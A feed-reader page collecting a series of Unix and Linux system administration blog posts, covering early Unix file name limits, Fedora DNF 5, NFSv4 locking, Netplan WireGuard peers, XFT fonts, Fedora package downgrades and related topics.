Reading view

There are new articles available, click to refresh the page.

The length of file names in early Unix

By: cks

If you use Unix today, you can enjoy relatively long file names on more or less any filesystem that you care to name. But it wasn't always this way. Research V7 had 14-byte filenames, and the System III/System V lineage continued this restriction until it merged with BSD Unix, which had significantly increased this limit as part of moving to a new filesystem (initially called the 'Fast File System', for good reasons). You might wonder where this unusual number came from, and for that matter, what the file name limit was on very early Unixes (it was 8 bytes, which surprised me; I vaguely assumed that it had been 14 from the start).

I've mentioned before that the early versions of Unix had a quite simple format for directory entries. In V7, we can find the directory structure specified in sys/dir.h (dir(5) helpfully directs you to sys/dir.h), which is so short that I will quote it in full:

#ifndef	DIRSIZ
#define	DIRSIZ	14
#endif
struct	direct
{
    ino_t    d_ino;
    char     d_name[DIRSIZ];
};

To fill in the last blank, ino_t was a 16-bit (two byte) unsigned integer (and field alignment on PDP-11s meant that this structure required no padding), for a total of 16 bytes. This directory structure goes back to V4 Unix. In V3 Unix and before, directory entries were only ten bytes long, with 8 byte file names.

(Unix V4 (the Fourth Edition) was when the kernel was rewritten in C, so that may have been considered a good time to do this change. I do have to wonder how they handled the move from the old directory format to the new one, since Unix at this time didn't have multiple filesystem types inside the kernel; you just had the filesystem, plus all of your user tools knew the directory structure.)

One benefit of the change in filename size is that 16-byte directory entries fit evenly in 512-byte disk blocks (or other powers-of-two buffer sizes). You never have a directory entry that spans two disk blocks, so you can deal with directories a block at a time. Ten byte directory entries don't have this property; eight-byte ones would, but then that would leave space for only six character file names, and presumably that was considered too small even in Unix V1.

PS: That inode numbers in V7 (and earlier) were 16-bit unsigned integers does mean what you think it means; there could only be at most 65,536 inodes in a single classical V7 filesystem. If you needed more files, you had better make more filesystems. Early Unix had a lot of low limits like that, some of them quite hard-coded.

Fedora's DNF 5 and the curse of mandatory too-smart output

By: cks

DNF is Fedora's high(er) level package management system, which pretty much any system administrator is going to have to use to install and upgrade packages. Fedora 41 and later have switched from DNF 4 to DNF 5 as their normal (and probably almost mandatory) version of DNF. I ran into some problems with this switch, and since then I've found other issues, all of which boil down to a simple issue: DNF 5 insists on doing too-smart output.

Regardless of what you set your $TERM to and what else you do, if DNF 5 is connected to a terminal (and perhaps if it isn't), it will pretty-print its output in an assortment of ways. As far as I can tell it simply assumes ANSI cursor addressability, among other things, and will always fit its output to the width of your terminal window, truncating output as necessary. This includes output from RPM package scripts that are running as part of the update. Did one of them print a line longer than your current terminal width? Tough, it was probably truncated. Are you using script so that you can capture and review all of the output from DNF and RPM package scripts? Again, tough, you can't turn off the progress bars and other things that will make a complete mess of the typescript.

(It's possible that you can find the information you want in /var/log/dnf5.log in un-truncated and readable form, but if so it's buried in debug output and I'm not sure I trust dnf5.log in general.)

DNF 5 is far from the only offender these days. An increasing number of command line programs simply assume that they should always produce 'smart' output (ideally only if they're connected to a terminal). They have no command line option to turn this off and since they always use 'ANSI' escape sequences, they ignore the tradition of '$TERM' and especially 'TERM=dumb' to turn that off. Some of them can specifically disable colour output (typically with one of a number of environment variables, which may or may not be documented, and sometimes with a command line option), but that's usually the limits of their willingness to stop doing things. The idea of printing one whole line at a time as you do things and not printing progress bars, interleaving output, and so on has increasingly become a non-starter for modern command line tools.

(Another semi-offender is Debian's 'apt' and also 'apt-get' to some extent, although apt-get's progress bars can be turned off and 'apt' is explicitly a more user friendly front end to apt-get and friends.)

PS: I can't run DNF with its output directed into a file because it wants you to interact with it to approve things, and I don't feel like letting it run freely without that.

The lack of a good command line way to sort IPv6 addresses

By: cks

A few years ago, I wrote about how 'sort -V' can sort IPv4 addresses into their natural order for you. Even back then I was smart enough to put in that 'IPv4' qualification and note that this didn't work with IPv6 addresses, and said that I didn't know of any way to handle IPv6 addresses with existing command line tools. As far as I know, that remains the case today, although you can probably build a Perl, Python, or other language program that does such sorting for you if you need to do this regularly.

Unix tools like 'sort' are pretty flexible, so you might innocently wonder why it can't be coerced into sorting IPv6 addresses. The first problem is that IPv6 addresses are written in hex without leading 0s, not decimal. Conventional sort will correctly sort hex numbers if all of the numbers are the same length, but IPv6 addresses are written in hex groups that conventionally drop leading zeros, so you will have 'ff' instead of '00ff' in common output (or '0' instead of '0000'). The second and bigger problem is the IPv6 '::' notation, which stands for the longest run of all-zero fields, ie some number of '0000' fields.

(I'm ignoring IPv6 scopes and zones for this, let's assume we have public IPv6 addresses.)

If IPv6 addresses were written out in full, with leading 0s on fields and all their 0000 fields, you could handle them as a simple conventional sort (you wouldn't even need to tell sort that the field separator was ':'). Unfortunately they almost never are, so you need to either transform them to that form, print them out, sort the output, and perhaps transform them back, or read them into a program as 128-bit numbers, sort the numbers, and print them back out as IPv6 addresses. Ideally your language of choice for this has a way to sort a collection of IPv6 addresses.

The very determined can probably do this with awk with enough work (people have done amazing things in awk). But my feeling is that doing this in conventional Unix command line tools is a Turing tarpit; you might as well use a language where there's a type of IPv6 addresses that exposes the functionality that you need.

(And because IPv6 addresses are so complex, I suspect that GNU Sort will never support them directly. If you need GNU Sort to deal with them, the best option is a program that turns them into their full form.)

PS: People have probably written programs to sort IPv6 addresses, but with the state of the Internet today, the challenge is finding them.

Some notes on using 'join' to supplement one file with data from another

By: cks

Recently I said something vaguely grumpy about the venerable Unix 'join' tool. As the POSIX specification page for join will unhelpfully tell you, join is a 'relational database operator', which means that it implements the rough equivalent of SQL joins. One way to use join is to add additional information for some lines in your input data.

Suppose, not entirely hypothetically, that we have an input file (or data stream) that starts with a login name and contains some additional information, and that for some logins (but not all of them) we have useful additional data about them in another file. Using join, the simple case of this is easy, if the 'master' and 'suppl' files are already sorted:

join -1 1 -2 1 -a 1 master suppl

(I'm sticking to POSIX syntax here. Some versions of join accept '-j 1' as an alternative to '-1 1 -2 1'.)

Our specific options tell join to join each line of 'master' and 'suppl' on the first field in each (the login) and print them, and also print all of the lines from 'master' that didn't have a login in 'suppl' (that's the '-a 1' argument). For lines with matching logins, we get all of the fields from 'master' and then all of the extra fields from 'suppl'; for lines from 'master' that don't match, we just get the fields from 'master'. Generally you'll tell apart which lines got supplemented and which ones didn't by how many fields they have.

If we want something other than all of the fields in the order that they are in the existing data source, in theory we have the '-o <list>' option to tell join what fields from each source to output. However, this option has a little problem, which I will show you by quoting the important bit from the POSIX standard (emphasis mine):

The fields specified by list shall be written for all selected output lines. Fields selected by list that do not appear in the input shall be treated as empty output fields.

What that means is that if we're also printing non-joined lines from our 'master' file, our '-o' still applies and any fields we specified from 'suppl' will be blank and empty (unless you use '-e'). This can be inconvenient if you were re-ordering fields so that, for example, a field from 'suppl' was listed before some fields from 'master'. It also means that you want to use '1.1' to get the login from 'master', which is always going to be there, not '2.1', the login from 'suppl', which is only there some of the time.

(All of this assumes that your supplementary file is listed second and the master file first.)

On the other hand, using '-e' we can simplify life in some situations. Suppose that 'suppl' contains only one additional interesting piece of information, and it has a default value that you'll use if 'suppl' doesn't contain a line for the login. Then if 'master' has three fields and 'suppl' two, we can write:

join -1 1 -2 1 -a 1 -e "$DEFVALUE" -o '1.1,1.2,1.3,2.2' master suppl

Now we don't have to try to tell whether or not a line from 'master' was supplemented by counting how many fields it has; everything has the same number of fields, it's just sometimes the last (supplementary) field is the default value.

(This is harder to apply if you have multiple fields from the 'suppl' file, but possibly you can find a 'there is nothing here' value that works for the rest of your processing.)

Netplan can only have WireGuard peers in one file

By: cks

We have started using WireGuard to build a small mesh network so that machines outside of our network can securely get at some services inside it (for example, to send syslog entries to our central syslog server). Since this is all on Ubuntu, we set it up through Netplan, which works but which I said 'has warts' in my first entry about it. Today I discovered another wart due to what I'll call the WireGuard provisioning problem:

Current status: provisioning WireGuard endpoints is exhausting, at least in Ubuntu 22.04 and 24.04 with netplan. So many netplan files to update. I wonder if Netplan will accept files that just define a single peer for a WG network, but I suspect not.

The core WireGuard provisioning problem is that when you add a new WireGuard peer, you have to tell all of the other peers about it (or at least all of the other peers you want to be able to talk to the new peer). When you're using iNetplan, it would be convenient if you could put each peer in a separate file in /etc/netplan; then when you add a new peer, you just propagate the new Netplan file for the peer to everything (and do the special Netplan dance required to update peers).

(Apparently I should now call it 'Canonical Netplan', as that's what its front page calls it. At least that makes it clear exactly who is responsible for Netplan's state and how it's not going to be widely used.)

Unfortunately this doesn't work, and it doesn't work in a dangerous way, which is that Netplan only notices one set of WireGuard peers in one netplan file (at least on servers, using systemd-networkd as the backend). If you put each peer in its own file, only the first peer is picked up. If you define some peers in the file where you define your WireGuard private key, local address, and so on, and some peers in another file, only peers from whichever is first will be used (even if the first file only defines peers, which isn't enough to bring up a WireGuard device by itself). As far as I can see, Netplan doesn't report any errors or warnings to the system logs on boot about this situation; instead, you silently get incomplete WireGuard configurations.

This is visibly and clearly a Netplan issue, because on servers you can inspect the systemd-networkd files written by Netplan (in /run/systemd/network). When I do this, the WireGuard .netdev file has only the peers from one file defined in it (and the .netdev file matches the state of the WireGuard interface). This is especially striking when the netplan file with the private key and listening port (and some peers) is second; since the .netdev file contains the private key and so on, Netplan is clearly merging data from more than one netplan file, not completely ignoring everything except the first one. It's just ignoring any peers encountered after the first set of them.

My overall conclusion is that in Netplan, you need to put all configuration for a given WireGuard interface into a single file, however tempting it might be to try splitting it up (for example, to put core WireGuard configuration stuff in one file and then list all peers in another one).

I don't know if this is an already filed Netplan bug and I don't plan on bothering to file one for it, partly because I don't expect Canonical to fix Netplan issues any more than I expect them to fix anything else and partly for other reasons.

PS: I'm aware that we could build a system to generate the Netplan WireGuard file, or maybe find a YAML manipulating program that could insert and delete blocks that matched some criteria. I'm not interested in building yet another bespoke custom system to deal with what is (for us) a minor problem, since we don't expect to be constantly deploying or removing WireGuard peers.

These days, Linux audio seems to just work (at least for me)

By: cks

For a long time, the common perception was that 'Linux audio' was the punchline for a not particularly funny joke. I sort of shared that belief; although audio had basically worked for me for a long time, I had a simple configuration and dreaded having to make more complex audio work in my unusual desktop environment. But these days, audio seems to just work for me, even in systems that have somewhat complex audio options.

On my office desktop, I've wound up with three potential audio outputs and two audio inputs: the motherboard's standard sound system, a USB headset with a microphone that I use for online meetings, the microphone on my USB webcam, and (to my surprise) a HDMI audio output because my LCD displays do in fact have tiny little speakers built in. In PulseAudio (or whatever is emulating it today), I have the program I use for online meetings set to use the USB headset and everything else plays sound through the motherboard's sound system (which I have basic desktop speakers plugged into). All of this works sufficiently seamlessly that I don't think about it, although I do keep a script around to reset the default audio destination.

On my home desktop, for a long time I had a simple single-output audio system that played through the motherboard's sound system (plus a microphone on a USB webcam that was mostly not connected). Recently I got an outboard USB DAC and, contrary to my fears, it basically plugged in and just worked. It was easy to set the USB DAC as the default output in pavucontrol and all of the settings related to it stick around even when I put it to sleep overnight and it drops off the USB bus. I was quite pleased by how painless the USB DAC was to get working, since I'd been expecting much more hassles.

(Normally I wouldn't bother meticulously switching the USB DAC to standby mode when I'm not using it for an extended time, but I noticed that the case is clearly cooler when it rests in standby mode.)

This is still a relatively simple audio configuration because it's basically static. I can imagine more complex ones, where you have audio outputs that aren't always present and that you want some programs (or more generally audio sources) to use when they are present, perhaps even with priorities. I don't know if the Linux audio systems that Linux distributions are using these days could cope with that, or if they did would give you any easy way to configure it.

(I'm aware that PulseAudio and so on can be fearsomely complex under the hood. As far as the current actual audio system goes, I believe that what my Fedora 41 machines are using for audio is PipeWire (also) with WirePlumber, based on what processes seem to be running. I think this is the current Fedora 41 audio configuration in general, but I'm not sure.)

The appeal of keyboard launchers for (Unix) desktops

By: cks

A keyboard launcher is a big part of my (modern) desktop, but over on the Fediverse I recently said something about them in general:

I don't necessarily suggest that people use dmenu or some equivalent. Keyboard launchers in GUI desktops are an acquired taste and you need to do a bunch of setup and infrastructure work before they really shine. But if you like driving things by the keyboard and will write scripts, dmenu or equivalents can be awesome.

The basic job of a pure keyboard launcher is to let you hit a key, start typing, and then select and do 'something'. Generally the keyboard launcher will make a window appear so that you can see what you're typing and maybe what you could complete it to or select.

The simplest and generally easiest way to use a keyboard launcher, and how many of them come configured to work, is to use it to select and run programs. You can find a version of this idea in GNOME, and even Windows has a pseudo-launcher in that you can hit a key to pop up the Start menu and the modern Start menu lets you type in stuff to search your programs (and other things). One problem with the GNOME version, and many basic versions, is that in practice you don't necessarily launch desktop programs all that often or launch very many different ones, so you can have easier ways to invoke the ones you care about. One problem with the Windows version (at least in my experience) is that it will do too much, which is to say that no matter what garbage you type into it by accident, it will do something with that garbage (such as launching a web search).

The happy spot for a keyboard launcher is somewhere in the middle, where they do a variety of things that are useful for you but not without limits. The best window launcher for your desktop is one that gives you fast access to whatever things you do a lot, ideally with completion so you type as little as possible. When you have it tuned up and working smoothly the feel is magical; I tap a key, type a couple of characters and then hit tab, hit return, and the right thing happens without me thinking about it, all fast enough that I can and do type ahead blindly (which then goes wrong if the keyboard launcher doesn't start fast enough).

The problem with keyboard launchers, and why they're not for everyone, is that everyone has a different set of things that they do a lot and that are useful for them to trigger entirely through the keyboard. No keyboard launcher will come precisely set up for what you do a lot in their default installation, so at a minimum you need to spend the time and effort to curate what the launcher will do and how it does it. If you're more ambitious, you may need to build supporting scripts that give the launcher a list of things to complete and then act on them when you complete one. If you don't curate the launcher and throw in the kitchen sink, you wind up with the Windows experience where it will certainly do something when you type things but perhaps not really what you wanted.

(For example, I routinely ssh to a lot of our machines, so my particular keyboard launcher setup lets me type a machine name (with completion) to start a session to it. But I had to build all of that, including sourcing the machine names I wanted included from somewhere, and this isn't necessarily useful for people who aren't constantly ssh'ing to machines.)

There are a variety of keyboard launchers for both X and Wayland, basically none of which I have any experience with. See the Arch Wiki section on application launchers. Someday I will have to get a Wayland equivalent to my particular modified dmenu, a thought that fills me with no more enthusiasm than any other part of replacing my whole X environment.

PS: Another issue with keyboard launchers is that sometimes you're wrong about what you want to do with them. I once built an entire keyboard launcher setup to select terminal windows and then later wound up abandoning it when I didn't use it enough.

My Cinnamon desktop customizations (as of 2025)

By: cks

A long time ago I wrote up some basic customizations of Cinnamon, shortly after I started using Cinnamon (also) on my laptop of the time. Since then, the laptop got replaced with another one and various things changed in both the land of Cinnamon and my customizations (eg, also). Today I feel like writing down a general outline of my current customizations, which fall into a number of areas from the modest but visible to the large but invisible.

The large but invisible category is that just like on my main fvwm-based desktop environment, I use xcape (plus a custom Cinnamon key binding for a weird key combination) to invoke my custom dmenu setup (1, 2) when I tap the CapsLock key. I have dmenu set to come up horizontally on the top of the display, which Cinnamon conveniently leaves alone in the default setup (it has its bar at the bottom). And of course I make CapsLock into an additional Control key when held.

(On the laptop I'm using a very old method of doing this. On more modern Cinnamon setups in virtual machines, I do this with Settings → Keyboard → Layout → Options, and then in the CapsLock section set CapsLock to be an additional Ctrl key.)

To start xcape up and do some other things, like load X resources, I have a personal entry in Settings → Startup Applications that runs a script in my ~/bin/X11. I could probably do this in a more modern way with an assortment of .desktop files in ~/.config/autostart (which is where my 'Startup Applications' setting actually wind up) that run each thing individually or perhaps some systemd user units. But the current approach works and is easy to modify if I want to add or remove things (I can just edit the script).

I have a number of Cinnamon 'applets' installed on my laptop and my other Cinnamon VM setups. The ones I have everywhere are Spices Update and Shutdown Applet, the latter because if I tell the (virtual) machine to log me off, shut down, or restart, I generally don't want to be nagged about it. On my laptop I also have CPU Frequency Applet (set to only display a summary) and CPU Temperature Indicator, for no compelling reason. In all environments I also pin launchers for Firefox and (Gnome) Terminal to the Cinnamon bottom bar, because I start both of them often enough. I position the Shutdown Applet on the left side, next to the launchers, because I think of it as a peculiar 'launcher' instead of an applet (on the right).

(The default Cinnamon keybindings also start a terminal with Ctrl + Alt + T, which you can still find through the same process from several years ago provided that you don't cleverly put something in .local/share/glib-2.0/schemas and then run 'glib-compile-schemas .' in that directory. If I was a smarter bear, I'd understand what I should have done when I was experimenting with something.)

On my virtual machines with Cinnamon, I don't bother with the whole xcape and dmenu framework, but I do set up the applets and the launchers and fix CapsLock.

(This entry was sort of inspired by someone I know who just became a Linux desktop user (after being a long time terminal user).)

Sidebar: My Cinnamon 'window manager' custom keybindings

I have these (on my laptop) and perpetually forget about them, so I'm going to write them down now so perhaps that will change.

move-to-corner-ne=['<Alt><Super>Right']
move-to-corner-nw=['<Alt><Super>Left']
move-to-corner-se=['<Primary><Alt><Super>Right']
move-to-corner-sw=['<Primary><Alt><Super>Left']
move-to-side-e=['<Shift><Alt><Super>Right']
move-to-side-n=['<Shift><Alt><Super>Up']
move-to-side-s=['<Shift><Alt><Super>Down']
move-to-side-w=['<Shift><Alt><Super>Left']

I have some other keybindings on the laptop but they're even less important, especially once I added dmenu.

Looking at what NFSv4 clients have locked on a Linux NVS(v4) server

By: cks

A while ago I wrote an entry about (not) finding which NFSv4 client owns a lock on a Linux NFS(v4) server, where the best I could do was pick awkwardly through the raw NFS v4 client information in /proc/fs/nfsd/clients. Recently I discovered an alternative to doing this by hand, which is the nfsdclnts program, and as a result of digging into it and what I was seeing when I tried it out, I now believe I have a better understanding of the entire situation (which was previously somewhat confusing).

The basic thing that nfsdclnts will do is list 'locks' and some information about them with 'nfsdclnts -t lock', in addition to listing other state information such as 'open', for open files, and 'deleg', for NFS v4 delegations. The information it lists is somewhat limited, for example it will list the inode number but not the filesystem, but on the good side nfsdclnts is a Python program so you can easily modify it to report any extra information that exists in the clients/#/states files. However, this information about locks is not complete, because of how file level locks appear to normally manifest in NFS v4 client state.

(The information in the states files is limited, although it contains somewhat more than nfsdclnts shows.)

Here is how I understand NFS v4 locking and states. To start with, NFS v4 has a feature called delegations where the NFS v4 server can hand a lot of authority over a file to a NFS v4 client. When a NFS v4 client accesses a file, the NFS v4 server likes to give it a delegation if this is possible; it normally will be if no one else has the file open or active. Once a NFS v4 client holds a delegation, it can lock the file without involving the NFS v4 server. At this point, the client's 'states' file will report an opaque 'type: deleg' entry for the file (and this entry may or may not have a filename or instead be what nfsdclnts will report as 'disconnected dentry').

While a NFS v4 client has the file delegated, if any other NFS v4 client does anything with the file, including simply opening it, the NFS v4 server will recall the delegation from the original client. As a result, the original client now has to tell the NFS v4 server that it has the file locked. At this point a 'type: lock' entry for the file appears in the first NFS v4 client's states file. If the first NFS v4 client releases its lock while the second NFS v4 client is trying to acquire it, the second NFS v4 client will not have a delegation for the file, so its lock will show up as an explicit 'type: lock' entry in its states file.

An additional wrinkle, a NFS v4 client holding a delegation doesn't immediately release it once all processes have released their locks, closed the file, and so on. Instead the delegation may linger on for some time. If another NFS v4 client opens the file during this time, the first client will lose the delegation but the second NFS v4 client may not get a delegation from the NFS v4 server, so its lock will be visible as a 'type: lock' states file entry.

A third wrinkle is that multiple clients may hold read-only delegations for a file and have fcntl() read locks on it at once, with each of them having a 'type: deleg, access: r' entry for it in their states files. These will only become visible 'type: lock' states entries if the clients have to release their delegations.

So putting this all together:

  • If there is a 'type: lock' entry for the file in any states file (or it's listed in 'nfsdclnts -t lock'), the file is definitely locked by whoever has that entry.

  • If there are no 'type: deleg' or 'type: lock' entries for the file, it's definitely not locked; you can also see this by whether nfsdclnts lists it as having delegations or locks.

  • If there are 'type: deleg' entries for the file, it may or may not be locked by the NFS v4 client (or clients) with the delegation. If the delegation is an 'access: w' delegation, you can see if someone actually has the file locked by accessing the file on another NFS v4 client, which will force the NFS v4 server to recall the delegation and expose the lock if there is one.

If the delegation is 'access: r' and might have multiple read-only locks, you can't force the NFS v4 server to recall the delegation by merely opening the file read-only (for example with 'cat file' or 'less file'). Instead the server will only recall the delegation if you open the file read-write. A convenient way to do this is probably to use 'flock -x <file> -c /bin/true', although this does require you to have more permissions for the file than simply the ability to read it.

Sidebar: Disabling NFS v4 delegations on the server

Based on trawling various places, I believe this is done by writing a '0' to /proc/sys/fs/leases-enabled (or the equivalent 'fs.leases-enabled' sysctl) and then apparently restarting your NFS v4 server processes. This will disable all user level uses of fcntl()'s F_SETLEASE and F_GETLEASE as an additional effect, and I don't know if this will affect any important programs running on the NFS server itself. Based on a study of the kernel source code, I believe that you don't need to restart your NFS v4 server processes if it's sufficient for the NFS server to stop handing out new delegations but current delegations can stay until they're dropped.

(There have apparently been some NFS v4 server and client issues with delegations, cf, along with other NFS v4 issues. However, I don't know if the cure winds up being worse than the disease here, or if there's another way to deal with these stateid problems.)

Unix files have (at least) two sizes

By: cks

I'll start by presenting things in illustrated form:

; ls -l testfile
-rw-r--r-- 1 cks 262144 Apr 13 22:03 testfile
; ls -s testfile
1 testfile
; ls -slh testfile
512 -rw-r--r-- 1 cks 256K Apr 13 22:03 testfile

The two well known sizes that Unix files have are the logical 'size' in bytes and what stat.h describes as "the number of blocks allocated for this object", often converted to some number of bytes (as ls is doing here in the last command). A file's size in bytes is roughly speaking the last file offset that has been written to in the file, and not all of the bytes covered by it may have actually been written; when this is the case, the result is a sparse file. Sparse files are the traditional cause of a mismatch between the byte size and the number of blocks a file uses. However, that is not what is happening here.

This file is on a ZFS filesystem with ZFS's compression turned on, and it was created with 'dd if=/dev/zero of=testfile bs=1k count=256'. In ZFS, zeroes compress extremely well, and so ZFS has written basically no physical data blocks and faithfully reported that (minimal) number in the stat() st_blocks field. However, at the POSIX level we have indeed written data to all 256 KBytes of the file; it's not a sparse file. This is an extreme example of filesystem compression, and there are plenty of lesser ones.

This leaves us with a third size, which is the number of logical blocks for this file. When a filesystem is doing data compression, this number will be different from the number of physical blocks used. As far as I can tell, the POSIX stat.h description doesn't specify which one you have to report for st_blocks. As we can see, ZFS opts to report the physical block size of the file, which is probably the more useful number for the purposes of things like 'du'. However, it does leave us with no way of finding out the logical block size, which we may care about for various reasons (for example, if our backup system can skip unwritten sparse blocks but always writes out uncompressed blocks).

This also implies that a non-sparse file can change its st_blocks number if you move it from one filesystem to another. One filesystem might have compression on and the other one have it off, or they might have different compression algorithms that give different results. In some cases this will cause the file's space usage to expand so that it doesn't actually fit into the new filesystem (or for a tree of files to expand their space usage).

(I don't know if there are any Unix filesystems that report the logical block size in st_blocks and only report the physical block size through a private filesystem API, if they report it at all.)

One way to set up local programs in a multi-architecture Unix environment

By: cks

Back in the old days, it used to be reasonably routine to have 'multi-architecture' Unix environments with shared files (where here architecture was a combination of the process architecture and the Unix variant). The multi-architecture days have faded out, and with them fading, so has information about how people made this work with things like local binaries.

In the modern era of large local disks and build farms, the default approach is probably to simply build complete copies of '/local' for each architecture type and then distribute the result around somehow. In the old days people were a lot more interested in reducing disk space by sharing common elements and then doing things like NFS-mounting your entire '/local', which made life more tricky. There likely were many solutions to this, but the one I learned at the university as a young sprout worked like the following.

The canonical paths everyone used and had in their $PATH were things like /local/bin, /local/lib, /local/man, and /local/share. However, you didn't (NFS) mount /local; instead, you NFS mounted /local/mnt (which was sort of an arbitrary name, as we'll see). In /local/mnt there were 'share' and 'man' directories, and also a per-architecture directory for every architecture you supported, with names like 'solaris-sparc' or 'solaris-x86'. These per-architecture directories contained 'bin', 'lib', 'sbin', and so on subdirectories.

(These directories contained all of the locally installed programs, all jumbled together, which did have certain drawbacks that became more and more apparent as you added more programs.)

Each machine had a /local directory on its root filesystem that contained /local/mnt, symlinks from /local/share and /local/man to 'mnt/share' and 'mnt/man', and then symlinks for the rest of the directories that went to 'mnt/<arch>/bin' (or sbin or lib). Then everyone mounted /local/mnt on, well, /local/mnt. Since /local and its contents were local to the machine, you could have different symlinks on each machine that used the appropriate architecture (and you could even have built them on boot if you really wanted to, although in practice they were created when the machine was installed).

When you built software for this environment, you told it that its prefix was /local, and let it install itself (on a suitable build server) using /local/bin, /local/lib, /local/share and so on as the canonical paths. You had to build (and install) software repeatedly, once for each architecture, and it was on the software (and you) to make sure that /local/share/<whatever> was in fact the same from architecture to architecture. System administrators used to get grumpy when people accidentally put architecture dependent things in their 'share' areas, but generally software was pretty good about this in the days when it mattered.

(In some variants of this scheme, the mount points were a bit different because the shared stuff came from one NFS server and the architecture dependent parts from another, or might even be local if your machine was the only instance of its particular architecture.)

There were much more complicated schemes that various places did (often universities), including ones that put each separate program or software system into its own directory tree and then glued things together in various ways. Interested parties can go through LISA proceedings from the 1980s and early 1990s.

Getting older, now-replaced Fedora package updates

By: cks

Over the history of a given Fedora version, Fedora will often release multiple updates to the same package (for example, kernels, but there are many others). When it does this, the older package wind up being removed from the updates repository and are no longer readily available through mechanisms like 'dnf list --showduplicates <package>'. For a long time I used dnf's 'local' plugin to maintain a local archive of all packages I'd updated, so I could easily revert, but it turns out that as of Fedora 41's change to dnf5 (dnf version 5), that plugin is not available (presumably it hasn't been ported to dnf5, and may never be). So I decided to look into my other options for retrieving and installing older versions of packages, in case the most recent version has a bug that affects me (which has happened).

Before I take everyone on a long yak-shaving expedition, the simplest and best answer is to install the 'fedora-repos-archive' package, which installs an additional Fedora repository that has those replaced updates. After installing it, I suggest that you edit /etc/yum.repos.d/fedora-updates-archive.repo to disable it by default, which will save you time, bandwidth, and possibly aggravation. Then when you really want to see all possible versions of, say, Rust, you can do:

dnf list --showduplicates --enablerepo=updates-archive rust

You can then use 'dnf downgrade ...' as appropriate.

(Like the other Fedora repositories, updates-archive automatically knows your release version and picks packages from it. I think you can change this a bit with '--releasever=<NN>', but I'm not sure how deep the archive is.)

The other approach is to use Fedora Bodhi (also) and Fedora Koji (also) to fetch the packages for older builds, in much the same way as you can use Bodhi (and Koji) to fetch new builds that aren't in the updates or updates-testing repository yet. To start with, we're going to need to find out what's available. I think this can be done through either Bodhi or Koji, although Koji is presumably more authoritative. Let's do this for Rust in Fedora 41:

bodhi updates query --packages rust --releases f41
koji list-builds --state COMPLETE --no-draft --package rust --pattern '*.fc41'

Note that both of these listings are going to include package versions that were never released as updates for various reasons, and also versions built for the pre-release Fedora 41. Although Koji has a 'f41-updates' tag, I haven't been able to find a way to restrict 'koji list-builds' output to packages with that tag, so we're getting more than we'd like even after we use a pattern to restrict this to just Fedora 41.

(I think you may need to use the source package name, not a binary package one; if so, you can get it with 'rpm -qi rust' or whatever and looking at the 'Source RPM' line and name.)

Once you've found the package version you want, the easiest and fastest way to get it is through the koji command line client, following the directions in Installing Kernel from Koji with appropriate changes:

mkdir /tmp/scr
cd /tmp/scr
koji download-build --arch=x86_64 --arch=noarch rust-1.83.0-1.fc41

This will get you a bunch of RPMs, and then you can do 'dnf downgrade /tmp/scr/*.rpm' to have dnf do the right thing (only downgrading things you actually have installed).

One reason you might want to use Koji is that this gets you a local copy of the old package in case you want to go back and forth between it and the latest version for testing. If you use the dnf updates-archive approach, you'll be re-downloading the old version at every cycle. Of course at that point you can also use Koji to get a local copy of the latest update too, or 'dnf download ...', although Koji has the advantage that it gets all the related packages regardless of their names (so for Rust you get the 'cargo', 'clippy', and 'rustfmt' packages too).

(In theory you can work through the Fedora Bodhi website, but in practice it seems to be extremely overloaded at the moment and very slow. I suspect that the bot scraper plague is one contributing factor.)

PS: If you're using updates-archive and you just want to download the old packages, I think what you want is 'dnf download --enablerepo=updates-archive ...'.

Fedora 41 seems to have dropped an old XFT font 'property'

By: cks

Today I upgraded my office desktop from Fedora 40 to Fedora 41, and as traditional there was a little issue:

Current status: it has been '0' days since a Fedora upgrade caused X font problems, this time because xft apparently no longer accepts 'encoding=...' as a font specification argument/option.

One of the small issues with XFT fonts is that they don't really have canonical names. As covered in the "Font Name" section of fonts.conf, a given XFT font is a composite of a family, a size, and a number of attributes that may be used to narrow down the selection of the XFT font until there's only one option left (or no option left). One way to write that in textual form is, for example, 'Sans:Condensed Bold:size=13'.

For a long time, one of the 'name=value' properties that XFT font matching accepted was 'encoding=<something>'. For example, you might say 'encoding=iso10646-1' to specify 'Unicode' (and back in the long ago days, this apparently could make a difference for font rendering). Although I can't find 'encoding=' documented in historical fonts.conf stuff, I appear to have used it for more than a decade, dating back to when I first converted my fvwm configuration from XLFD fonts to XFT fonts. It's still accepted today on Fedora 40 (although I suspect it does nothing):

: f40 ; fc-match 'Sans:Condensed Bold:size=13:encoding=iso10646-1'
DejaVuSans.ttf: "DejaVu Sans" "Regular"

However, it's no longer accepted on Fedora 41:

: f41 ; fc-match 'Sans:Condensed Bold:size=13:encoding=iso10646-1'
Unable to parse the pattern

Initially I thought this had to be a change in fontconfig, but that doesn't seem to be the case; both Fedora 40 and Fedora 41 use the same version, '2.15.0', just with different build numbers (partly because of a mass rebuild for Fedora 41). Freetype itself went from version 2.13.2 to 2.13.3, but the release notes don't seem to have anything relevant. So I'm at a loss. At least it was easy to fix once I knew what had happened; I just had to take the ':encoding=iso10646-1' bit out from the places I had it.

(The visual manifestation was that all of my fvwm menus and window title bars switched to a tiny font. For historical reasons all of my XFT font specifications in my fvwm configuration file used 'encoding=...', so in Fedora 41 none of them worked and fvwm reported 'can't load font <whatever>' and fell back to its default of an XLFD font, which was tiny on my HiDPI display.)

PS: I suspect that this change will be coming in other Linux distributions sooner or later. Unsurprisingly, Ubuntu 24.04's fc-match still accepts 'encoding=...'.

PPS: Based on ltrace output, FcNameParse() appears to be what fails on Fedora 41.

I should learn systemd's features for restricting things

By: cks

Today, for reasons beyond the scope of this entry, I took something I'd been running by hand from the command line for testing and tried to set it up under systemd. This is normally straightforward, and it should have been extra straightforward because the thing came with a .service file. But that .service file used a lot of systemd's features for restricting what programs can do, and for my sins I'd decided to set up the program with its binary, configuration file, and so on in different places than it expected (and I think without some things it expected, like a supplementary group for permission to read some files). This was, unfortunately, an abject failure, so I wound up yanking all of the restrictions except 'DynamicUser=true'.

I'm confident that with enough time, I can (or could) sort out all of the problems (although I didn't feel like spending that time today). What this experience really points out is that systemd has a lot of options for really restricting what programs you run can do, and I'm not particularly familiar with them. To get the service working with all of its original restrictions, I'd have to read way through things like systemd.exec and understanding what everything the .service file used did. Once I did that, I could have understood what I needed to change to deal with my setup of the program.

(An expert probably could have fixed things in short order.)

That systemd has a lot of potential restrictions it can impose and that those restrictions are complex is not a flaw of systemd (or its fault). We already know that fine grained permissions are hard to set up and manage in any environment, especially if you don't know what you're doing (as I don't with systemd's restrictions). At the same time, fine grained restrictions are quite useful for being able to apply some restrictions to programs not designed for them.
